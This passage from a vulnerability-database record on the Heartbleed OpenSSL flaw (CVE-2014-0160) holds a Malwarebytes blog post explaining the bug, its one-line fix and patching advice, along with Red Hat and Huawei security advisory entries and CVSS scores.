From within the system, depending on the authorization level of the stolen credentials, threat actors can initiate more attacks, eavesdrop on communications, impersonate users, and steal data.\n\n### How Heartbleed works\n\n\n\n[Image source](<https://upload.wikimedia.org/wikipedia/commons/thumb/1/11/Simplified_Heartbleed_explanation.svg/1920px-Simplified_Heartbleed_explanation.svg.png> \"\" ) \n\n\nThe Heartbleed vulnerability damages the security of communication between SSL and TLS servers and clients because it weakens the Heartbeat extension. \n\n\nIdeally, the Heartbeat extension is supposed to secure the SSL and TLS protocols by validating requests made to the server. It allows a computer on one end of the communication to send a Heartbeat Request message. \n\n\nEach message contains a [payload](<https://blog.malwarebytes.com/glossary/payload/>)\u2014a text string that contains the transmitted information\u2014and a number that represents the memory length of the payload\u2014usually as a 16-bit integer. Before providing the requested information, the heartbeat extension is supposed to do a bounds check that validates the input request and returns the exact payload length that was requested. \n\n\nThe flaw in the OpenSSL heartbeat extension created a vulnerability in the validation process. Instead of doing a bounds check, the OpenSSL Heartbeat code allocated a response buffer sized by the length field in the request and copied that many bytes into it, without checking that length against the payload actually received. Threat actors could send a request and receive up to 64 kilobytes of any of the information available in the memory buffer. \n\n\nMemory buffers are temporary memory storage locations, created for the purpose of storing data in transit. They may contain batches of data types, which represent different stores of information. Essentially, a memory buffer keeps information before it\u2019s sent to its designated location. \n\n\nA memory buffer doesn\u2019t organize data\u2014it stores it in batches. 
One memory buffer may contain sensitive and financial information, as well as credentials, cookies, website pages and images, digital assets, and any data in transit. When threat actors exploit the Heartbleed vulnerability, they trick the Heartbeat extension into providing them with all of the information available within the memory buffer.\n\n### The Heartbleed fix\n\nBodo Moeller and Adam Langley of Google created the fix for Heartbleed. They wrote a code that told the Heartbeat extension to ignore any Heartbeat Request message that asks for more data than the payload needs. \n\n\nHere\u2019s an example of a [Heartbleed fix](<https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=96db902>):\n \n \n if (1 + 2 + payload + 16 > s->s3->rrec.length) return 0; /* silently discard per RFC 6520 sec. 4 */\n\n### How the Heartbleed vulnerability shaped OpenSSL as we know it\n\nThe [discovery of the Heartbleed vulnerability](<https://resources.whitesourcesoftware.com/blog-whitesource/how-the-heartbleed-vulnerability-shaped-openssl-as-we-know-it>) created worldwide panic. Once the fixes were applied, idle fingers started looking for the causes of the incident. Close scrutiny at OpenSSL revealed that this widely-popular library was maintained solely by two men with a shockingly low budget. \n\n\nThis finding spurred two positive initiatives that changed the landscape of open-source:\n\n * Organizations realized the importance of supporting open-source projects. There\u2019s only so much two people can do with their personal savings. Organizations, on the other hand, can provide the resources needed to maintain the security of open-source projects.\n * To help finance important open-source projects, Linux started the Core Infrastructure Initiative (CII). The CII chooses the most critical open-source projects, which are deemed essential for the vitality of the Internet and other information systems. 
The CII receives donations from large organizations and offers them to OSS initiatives in the form of programs and grants.\n\nAs with any change-leading crisis, the Heartbleed vulnerability also carried a negative side-effect: the rise of vulnerability brands. The Heartbleed vulnerability was discovered at the same time by two entities\u2014Google and Codenomicon. \n\n\nGoogle chose to disclose the vulnerability privately, sharing the information only with OpenSSL contributors. Codenomicon, on the other hand, chose to spread the news to the public. They named the vulnerability, created a logo and a website, and approached the announcement like a well-funded marketing event. \n\n\nIn the following years, many of the disclosed vulnerabilities were given an almost celebrity-like treatment, with PR agencies building them up into brands, and marketing agencies deploying branded names, logos, and websites. While this can certainly help warn the public against [zero-day ](<https://blog.malwarebytes.com/glossary/zero-day/>)vulnerabilities, it can also create massive confusion. \n\n\nNowadays, security experts and software developers are dealing with vulnerabilities in the thousands. To properly protect their systems, they need to prioritize vulnerabilities. That means deciding which vulnerability requires patching now, and which could be postponed. Sometimes, branded vulnerabilities are marketed as critical when they aren\u2019t. \n\n\nWhen that happens, not all affected parties have the time, skills, and resources to determine the true importance of the vulnerability. Instead of turning vulnerabilities into a buzz word, professionals could better serve the public by creating fixes.\n\n### Heartbleed today\n\nToday, five years after the disclosure of the Heartbleed vulnerability, it still exists in many servers and systems. Current versions of OpenSSL, of course, were fixed. 
However, systems that didn\u2019t (or couldn't) upgrade to the patched version of OpenSSL are still affected by the vulnerability and open to attack. \n\n\nFor threat actors, finding the Heartbleed vulnerability is a prize; one more easily accessed by automating the work of retrieving it. Once the threat actor finds a vulnerable system, it\u2019s relatively simple to exploit the vulnerability. When that happens, the threat actor gains access to information and/or credentials that could be used to launch other attacks. \n\n### To patch or not to patch\n\nThe Heartbleed vulnerability is a security bug that was introduced into OpenSSL due to human error. Due to the popularity of OpenSSL, many applications were impacted, and threat actors were able to obtain a huge amount of data. \n\n\nFollowing the discovery of the vulnerability, Google employees found a solution and provided OpenSSL contributors with the code that fixed the issue. OpenSSL users were then instructed to upgrade to the latest OpenSSL version. \n\n\nToday, however, the Heartbleed vulnerability can still be found in applications, systems, and devices, even though it\u2019s a matter of upgrading the OpenSSL version rather than editing the codebase. If you are concerned that you may be affected, you can [test your system](<https://geekflare.com/how-to-test-heart-bleed-ssl-vulnerabilities-cve-2014-0160/>) for the Heartbleed vulnerability and patch to eliminate the risk, or mitigate it if the device cannot be patched. Because a vulnerable system may already have leaked private keys and credentials from memory, follow the upgrade by restarting the services linked against OpenSSL, replacing keys and certificates, and resetting exposed passwords.\n\nAny server or cloud platform should be relatively easy to patch. However, IoT devices may require more advanced mitigation techniques, because they are sometimes unable to be patched. 
At this point, we recommend speaking with your sysadmin to determine how to mitigate the issue.\n\nThe post [Five years later, Heartbleed vulnerability still unpatched](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2019/09/everything-you-need-to-know-about-the-heartbleed-vulnerability/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "modified": "2019-09-12T15:00:00", "published": "2019-09-12T15:00:00", "id": "MALWAREBYTES:AC8C8799BB0970C229AB0C432EECB10A", "href": "https://blog.malwarebytes.com/exploits-and-vulnerabilities/2019/09/everything-you-need-to-know-about-the-heartbleed-vulnerability/", "type": "malwarebytes", "title": "Five years later, Heartbleed vulnerability still unpatched", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "redhat": [{"lastseen": "2019-08-13T18:45:46", "bulletinFamily": "unix", "cvelist": ["CVE-2014-0160"], "description": "The rhev-hypervisor6 package provides a Red Hat Enterprise Virtualization\nHypervisor ISO disk image. The Red Hat Enterprise Virtualization Hypervisor\nis a dedicated Kernel-based Virtual Machine (KVM) hypervisor. It includes\neverything necessary to run and manage virtual machines: a subset of the\nRed Hat Enterprise Linux operating environment and the Red Hat Enterprise\nVirtualization Agent.\n\nImportant: This update is an emergency security fix being provided outside\nthe scope of the published support policy for Red Hat Enterprise\nVirtualization listed in the References section. In accordance with the\nsupport policy for Red Hat Enterprise Virtualization, Red Hat Enterprise\nVirtualization Hypervisor 3.2 will not receive future security updates.\n\nNote: Red Hat Enterprise Virtualization Hypervisor is only available for\nthe Intel 64 and AMD64 architectures with virtualization extensions.\n\nAn information disclosure flaw was found in the way OpenSSL handled TLS and\nDTLS Heartbeat Extension packets. 
A malicious TLS or DTLS client or server\ncould send a specially crafted TLS or DTLS Heartbeat packet to disclose a\nlimited portion of memory per request from a connected client or server.\nNote that the disclosed portions of memory could potentially include\nsensitive information such as private keys. (CVE-2014-0160)\n\nRed Hat would like to thank the OpenSSL project for reporting this issue.\nUpstream acknowledges Neel Mehta of Google Security as the original\nreporter.\n\nUsers of the Red Hat Enterprise Virtualization Hypervisor are advised to\nupgrade to this updated package, which corrects this issue.\n", "modified": "2018-06-07T08:59:36", "published": "2014-04-10T04:00:00", "id": "RHSA-2014:0396", "href": "https://access.redhat.com/errata/RHSA-2014:0396", "type": "redhat", "title": "(RHSA-2014:0396) Important: rhev-hypervisor6 security update", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "huawei": [{"lastseen": "2019-02-01T18:02:35", "bulletinFamily": "software", "cvelist": ["CVE-2014-0160"], "description": "Products\n\nSwitches\nRouters\nWLAN\nServers\nSee All\n\n\n\nSolutions\n\nCloud Data Center\nEnterprise Networking\nWireless Private Network\nSolutions by Industry\nSee All\n\n\n\nServices\n\nTraining and Certification\nICT Lifecycle Services\nTechnology Services\nIndustry Solution Services\nSee All\n\n\n\nSee all offerings at e.huawei.com\n\n\n\nNeed Support ?\n\nProduct Support\nSoftware Download\nCommunity\nTools\n\nGo to Full Support", "edition": 1, "modified": "2015-03-11T00:00:00", "published": "2014-04-17T00:00:00", "id": "HUAWEI-SA-20140417-HEARTBLEED", "href": "https://www.huawei.com/en/psirt/security-advisories/2015/hw-332187", "title": "Security Advisory-OpenSSL Heartbeat Extension vulnerability (Heartbleed bug) on Huawei multiple products", "type": "huawei", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}]}